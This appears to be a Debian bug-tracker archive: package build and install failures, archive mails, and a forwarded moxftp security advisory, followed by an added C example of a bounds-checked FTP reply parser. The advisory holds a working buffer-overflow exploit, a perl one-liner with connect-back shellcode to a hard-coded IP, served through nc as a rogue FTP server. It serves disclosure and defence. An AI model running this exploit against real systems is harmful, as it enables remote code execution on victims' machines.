Bug#187402: webbase-doc: postinst failure in install-info
Package: webbase-doc
Version: 5.17.0-18
Severity: serious

Hi, here is the problem:

Setting up webbase-doc (5.17.0-18) ...
No `START-INFO-DIR-ENTRY' and no `This file documents'.
install-info(/usr/share/info/webbase.info): unable to determine description for `dir' entry - giving up
dpkg: error processing webbase-doc (--configure):

-- System Information:
Debian Release: testing/unstable
Architecture: i386
Kernel: Linux irancy 2.4.20-k7 #2 Sun Dec 1 13:41:25 EST 2002 i686
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED]

-- no debconf information
mergelog_4.5.1-3_i386.changes ACCEPTED
Accepted:
mergelog_4.5.1-3.diff.gz
  to pool/main/m/mergelog/mergelog_4.5.1-3.diff.gz
mergelog_4.5.1-3.dsc
  to pool/main/m/mergelog/mergelog_4.5.1-3.dsc
mergelog_4.5.1-3_i386.deb
  to pool/main/m/mergelog/mergelog_4.5.1-3_i386.deb
Announcing to debian-devel-changes@lists.debian.org

Thank you for your contribution to Debian.
catalog_1.03-7_i386.changes ACCEPTED
Accepted:
catalog_1.03-7.diff.gz
  to pool/main/c/catalog/catalog_1.03-7.diff.gz
catalog_1.03-7.dsc
  to pool/main/c/catalog/catalog_1.03-7.dsc
catalog_1.03-7_all.deb
  to pool/main/c/catalog/catalog_1.03-7_all.deb
Announcing to debian-devel-changes@lists.debian.org

Thank you for your contribution to Debian.
catalog override disparity
There are disparities between your recently accepted upload and the
override file for the following file(s):

catalog_1.03-7_all.deb: package says priority is optional, override says extra.

Either the package or the override file is incorrect. If you think
the override is correct and the package wrong please fix the package
so that this disparity is fixed in the next upload. If you feel the
override is incorrect then please reply to this mail and explain why.

[NB: this is an automatically generated mail; if you replied to one
like it before and have not received a response yet, please ignore
this mail. Your reply needs to be processed by a human and will be in
due course, but until then the installer will send these automated
mails; sorry.]

--
Debian distribution maintenance software

(This message was generated automatically; if you believe that there
is a problem with it please contact the archive administrators by
mailing [EMAIL PROTECTED])
Bug#187473: FTBFS: header file missing?
Package: webbase
Version: 5.17.0-18
Severity: important

Automatic build of webbase_5.17.0-18 on aahz by sbuild/m68k 1.170
[...]
** Using build dependencies supplied by package:
Build-Depends: debhelper (>> 4.0.0), mysql-client, libmysqlclient10-dev, libz-dev, liburi-dev, apache, libmifluz0-dev, debconf, flex, libunac1-dev, po-debconf, autotools-dev
** Filtered missing central deps that are dependencies of or provide build-deps:
zlib1g-dev (>= 1:1.1.4)
Warning: The following central src deps are (probably) missing:
mifluz-dev
[...]
checking if mifluz is wanted... yes
checking if zlib is wanted... yes
checking for inflateEnd in -lz... (cached) yes
checking for zlib.h... (cached) yes
checking for main in -lmifluz... yes
checking for mifluz.h... configure: error: header not found check config.log
make: *** [configure-stamp] Error 1

The last lines from config.log:

configure:5170: checking for main in -lmifluz
configure:5185: c++ -o conftest -g -O2 -Wall -I/usr/include/mysql -L/usr/lib conftest.C -lmifluz -lz -lmysqlclient -lz -luri -lm -lnsl 1>&5
configure:5217: checking for mifluz.h
configure:5227: c++ -E -I/usr/include/mysql conftest.C >/dev/null 2>conftest.out
In file included from /usr/include/c++/3.2/backward/iostream.h:31,
                 from /usr/include/mifluz/htString.h:20,
                 from /usr/include/mifluz/Dictionary.h:22,
                 from /usr/include/mifluz/Configuration.h:104,
                 from /usr/include/mifluz/WordContext.h:55,
                 from /usr/include/mifluz.h:86,
                 from configure:5223:
/usr/include/c++/3.2/backward/backward_warning.h:32:2: warning: #warning This file includes at least one deprecated or antiquated header. Please consider using one of the 32 headers found in section 1 7.4.1.2 of the C++ standard. Examples include substituting the header for the header for C ++ includes, or instead of the deprecated header . To disable this warning us e -Wno-deprecated.
configure: failed program was:
#line 5222 "configure"
#include "confdefs.h"
#include

Full build-log at:
http://buildd.debian.org/fetch.php?&pkg=webbase&ver=5.17.0-18&arch=m68k&stamp=1049349921&file=log&as=raw

Christian
Bug#187481: moxftp arbitrary code execution poc/advisory
Package: moxftp
Version: 2.2-18
Severity: grave
Tags: security

Unfortunately I am currently unable to discover the real problem behind
this potential exploit. I'm not even sure if it works on Linux. FreeBSD
people simply marked this package FORBIDDEN, but didn't fix the problem
either. *sigh*

Regards,

Joey

Knud Erik Højgaard wrote:
> Attached document explains all.
>
> This document is also available from http://kokanins.homepage.dk
>
> --
> Knud
> I. BACKGROUND
>
> According to the vendor moxftp is a "Ftp shell under X Window System".
> /usr/ports/ftp/moxftp
>
> II. DESCRIPTION
>
> Insufficient bounds checking leads to execution of arbitrary code.
>
> III. ANALYSIS
>
> Upon parsing the '220 welcome to server' ftp banner a buffer can be
> overrun, allowing us to execute our arbitrary code. The buffer may be
> constructed as such: [508 bytes][ebp ][eip ][nops][shellcode]. Placing
> the nops and shellcode in the buffer before ebp seems to cause some
> problems, luckily there's plenty of space after eip.
>
> Example run:
>
> $ perl -e 'print "220 " . "\x90" x 508 . "\x48\xfa\xbf\xbf" x 2 . "\x90" x
> 100 .
> "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x02\x24\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"
> .. "\n"' > file
> # nc -l -p 21 < file
>
> This sets up a rogue server which will overflow the buffer, and execute
> the shellcode. The shellcode is connect-back to 217.157.2.36 port 1,
> replace "\xd9\x9d\x02\x24" with a suitable ip for testing.
>
> IV. DETECTION
>
> moxftp-2.2 shipping with the FreeBSD ports system as well as from
> various webpages per 9/2-03 is vulnerable.
>
> V. WORKAROUND
>
> unknown
>
> VI. VENDOR FIX
>
> unknown
>
> VII. CVE INFORMATION
>
> unknown
>
> VIII. DISCLOSURE TIMELINE
>
> unknown
>
> IX. CREDIT
>
> Knud Erik Højgaard
>

--
Life is too short to run proprietary software. -- Bdale Garbee

Please always Cc to me when replying to me on the lists.
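
An added example, not moxftp's code (the vulnerable routine is not shown in this thread): a C reply-line parser that checks the banner length before copying, which is the kind of bounds check the advisory says is missing. The names parse_ftp_reply and struct ftp_reply are hypothetical, and the 508-byte limit is an assumption borrowed from the advisory's buffer layout.

```c
#include <stddef.h>
#include <string.h>

#define REPLY_TEXT_MAX 508  /* assumption: mirrors the advisory's 508-byte figure */

enum { REPLY_OK = 0, REPLY_MALFORMED = -1, REPLY_TOO_LONG = -2, REPLY_INCOMPLETE = -3 };

struct ftp_reply {
    int  code;                       /* three-digit reply code, e.g. 220 */
    char text[REPLY_TEXT_MAX + 1];   /* always NUL-terminated on REPLY_OK */
};

/* Parse one server reply line from wire[0..len). The text is copied only
 * after its length has been checked against the destination, so an oversized
 * banner is rejected instead of running past the end of out->text. */
int parse_ftp_reply(const char *wire, size_t len, struct ftp_reply *out)
{
    const char *nl = memchr(wire, '\n', len);
    if (nl == NULL)
        /* Longest acceptable unterminated line: "NNN " + text + CR. */
        return len > REPLY_TEXT_MAX + 5 ? REPLY_TOO_LONG : REPLY_INCOMPLETE;

    size_t line_len = (size_t)(nl - wire);
    if (line_len > 0 && wire[line_len - 1] == '\r')
        line_len--;                              /* strip the CR of CRLF */

    /* Expect "NNN " or "NNN-" (the latter starts a multi-line reply). */
    if (line_len < 4 || (wire[3] != ' ' && wire[3] != '-'))
        return REPLY_MALFORMED;
    int code = 0;
    for (int i = 0; i < 3; i++) {
        if (wire[i] < '0' || wire[i] > '9')
            return REPLY_MALFORMED;
        code = code * 10 + (wire[i] - '0');
    }

    size_t text_len = line_len - 4;
    if (text_len > REPLY_TEXT_MAX)
        return REPLY_TOO_LONG;                   /* caller should drop the connection */

    memcpy(out->text, wire + 4, text_len);
    out->text[text_len] = '\0';
    out->code = code;
    return REPLY_OK;
}
```

A caller that gets REPLY_TOO_LONG from the first line of a session has a server sending a banner larger than any legitimate greeting needs, which is worth logging along with the peer address.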